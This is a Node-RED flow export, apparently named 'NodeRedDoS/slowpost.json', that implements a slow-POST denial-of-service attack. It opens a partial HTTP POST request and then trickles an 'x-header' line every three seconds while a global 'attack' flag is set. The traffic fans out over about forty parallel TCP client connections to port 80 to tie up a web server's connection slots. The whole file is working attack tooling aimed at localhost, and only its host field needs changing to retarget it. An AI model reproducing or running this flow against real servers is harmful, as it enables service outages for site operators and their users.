NodeRedDoS/slowpost.json
[
  {
    "id": "c0ba19c4.3f45e8",
    "type": "inject",
    "name": "Start HTTP post",
    "topic": "",
    "payload": "POST index.html HTTP/1.0\\n",
    "payloadType": "string",
    "repeat": "",
    "crontab": "",
    "once": false,
    "x": 118,
    "y": 153,
    "z": "fbe661fe.0419a",
    "wires": [
      [
        "bab1556f.454ea8"
      ]
    ]
  },
  {
    "id": "5ec1621a.a13e9c",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 693,
    "y": 238,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "b0f20389.4f0e",
    "type": "inject",
    "name": "more headers.",
    "topic": "",
    "payload": "x-header: oneHeader\\n",
    "payloadType": "string",
    "repeat": "3",
    "crontab": "",
    "once": false,
    "x": 107,
    "y": 315,
    "z": "fbe661fe.0419a",
    "wires": [
      [
        "b1ef7ca8.4e108"
      ]
    ]
  },
  {
    "id": "4e0dba88.b1f244",
    "type": "inject",
    "name": "complete Request.",
    "topic": "",
    "payload": "\\n\\n",
    "payloadType": "string",
    "repeat": "",
    "crontab": "",
    "once": false,
    "x": 120.5,
    "y": 446,
    "z": "fbe661fe.0419a",
    "wires": [
      [
        "20ed119.fdf12ee"
      ]
    ]
  },
  {
    "id": "484403c6.b7bbfc",
    "type": "debug",
    "name": "",
    "active": true,
    "console": "false",
    "complete": "false",
    "x": 702,
    "y": 780,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "bab1556f.454ea8",
    "type": "function",
    "name": "Start Request",
    "func": "context.global.attack=true;\nvar msg = \"POST index.html HTTP/1.0\\n\";\nreturn {payload: msg};",
    "outputs": 1,
    "valid": true,
    "x": 128,
    "y": 217,
    "z": "fbe661fe.0419a",
    "wires": [
      [
        "18f52585.e70ada"
      ]
    ]
  },
  {
    "id": "b1ef7ca8.4e108",
    "type": "function",
    "name": "More Headers",
    "func": "if (context.global.attack) {\n\n    var msg = \"x-header: header\\n\"\n    return {payload: msg};\n}\nreturn;",
    "outputs": 1,
    "valid": true,
    "x": 163,
    "y": 379,
    "z": "fbe661fe.0419a",
    "wires": [
      [
        "18f52585.e70ada"
      ]
    ]
  },
  {
    "id": "20ed119.fdf12ee",
    "type": "function",
    "name": "complete Request",
    "func": "context.global.attack=false;\nvar msg = \"\\n\\n\"\nreturn {payload: msg};",
    "outputs": 1,
    "valid": true,
    "x": 135,
    "y": 529,
    "z": "fbe661fe.0419a",
    "wires": [
      [
        "18f52585.e70ada"
      ]
    ]
  },
  {
    "id": "e6f81992.1907e8",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 685,
    "y": 174,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "f2012d6.f0dfed",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 698,
    "y": 126,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "7f4b2833.80b4d8",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 677,
    "y": 292,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "3863378b.c79cc8",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 684,
    "y": 367,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "6f8f0eb0.9070f",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 692,
    "y": 422,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "18f52585.e70ada",
    "type": "change",
    "name": "",
    "rules": [],
    "action": "",
    "property": "",
    "from": "",
    "to": "",
    "reg": false,
    "x": 409,
    "y": 364,
    "z": "fbe661fe.0419a",
    "wires": [
      [
        "484403c6.b7bbfc",
        "6f8f0eb0.9070f",
        "3863378b.c79cc8",
        "7f4b2833.80b4d8",
        "5ec1621a.a13e9c",
        "e6f81992.1907e8",
        "f2012d6.f0dfed",
        "c92fb710.36d048",
        "674624e6.98b9dc",
        "bb6de99a.449218",
        "626f1b30.9d90e4",
        "80fffff0.7f",
        "9b20d9df.64df28",
        "ad50c9d3.52af38",
        "f2a2ae50.0d5d5",
        "733f84fa.8cc07c",
        "55a0a2a1.aa5f5c",
        "4ff109b7.b00ef8",
        "69370f36.96c8f",
        "976e3e50.6891c",
        "a7b24c9d.584db",
        "d20a1822.2df5e8",
        "2a6e312a.d591ce",
        "890dd7d7.76f228",
        "7d4292ea.82bd6c",
        "4105bbb.fbefa44",
        "41562293.bea9dc",
        "f940d979.06bf28",
        "965b5f0e.69a4a"
      ]
    ]
  },
  {
    "id": "80fffff0.7f",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 708,
    "y": 721,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "626f1b30.9d90e4",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 726,
    "y": 673,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "c92fb710.36d048",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 698,
    "y": 507,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "674624e6.98b9dc",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 727,
    "y": 555,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "bb6de99a.449218",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 732,
    "y": 620,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "733f84fa.8cc07c",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 378,
    "y": 20,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "f2a2ae50.0d5d5",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 700,
    "y": 20,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "ad50c9d3.52af38",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 696,
    "y": 55,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "9b20d9df.64df28",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 696,
    "y": 90,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "976e3e50.6891c",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 418,
    "y": 74,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "4ff109b7.b00ef8",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 553,
    "y": 29,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "69370f36.96c8f",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 454,
    "y": 128,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "55a0a2a1.aa5f5c",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 557,
    "y": 75,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "a7b24c9d.584db",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 456,
    "y": 455,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "d20a1822.2df5e8",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 455,
    "y": 498,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "2a6e312a.d591ce",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 456,
    "y": 544,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "890dd7d7.76f228",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 455,
    "y": 593,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "7d4292ea.82bd6c",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 455,
    "y": 641,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "4105bbb.fbefa44",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 462,
    "y": 680,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "41562293.bea9dc",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 463,
    "y": 719,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "9812120a.67edf",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 974,
    "y": 336,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "55b5199b.aa4ae8",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 977,
    "y": 390,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "7b9cbac0.846344",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 984,
    "y": 441,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "dc9ca731.236358",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 988,
    "y": 490,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "95098c71.6af67",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 988,
    "y": 540,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "bc8f88a9.437078",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 994,
    "y": 593,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "48726c8a.b78d94",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 997,
    "y": 643,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "80dc71b1.7f239",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 1001,
    "y": 703,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "9a766ed3.65899",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 961,
    "y": 753,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "c62764ad.39d898",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 981,
    "y": 288,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "f940d979.06bf28",
    "type": "change",
    "name": "",
    "rules": [],
    "action": "",
    "property": "",
    "from": "",
    "to": "",
    "reg": false,
    "x": 714,
    "y": 332,
    "z": "fbe661fe.0419a",
    "wires": [
      [
        "9812120a.67edf",
        "c62764ad.39d898",
        "55b5199b.aa4ae8",
        "7b9cbac0.846344",
        "dc9ca731.236358",
        "95098c71.6af67",
        "bc8f88a9.437078",
        "48726c8a.b78d94",
        "80dc71b1.7f239",
        "9a766ed3.65899",
        "d0037b6b.2ffc88",
        "77dc4990.8823b8",
        "e1c271af.1e3d9",
        "2e553a46.d1aac6",
        "64a286d7.9b5d78"
      ]
    ]
  },
  {
    "id": "d0037b6b.2ffc88",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 973,
    "y": 236,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "77dc4990.8823b8",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 969,
    "y": 192,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "e1c271af.1e3d9",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 967,
    "y": 141,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "2e553a46.d1aac6",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 959,
    "y": 93,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "64a286d7.9b5d78",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 951,
    "y": 49,
    "z": "fbe661fe.0419a",
    "wires": []
  },
  {
    "id": "965b5f0e.69a4a",
    "type": "tcp out",
    "host": "localhost",
    "port": "80",
    "beserver": "client",
    "base64": false,
    "end": false,
    "name": "Connection",
    "x": 395,
    "y": 305,
    "z": "fbe661fe.0419a",
    "wires": []
  }
]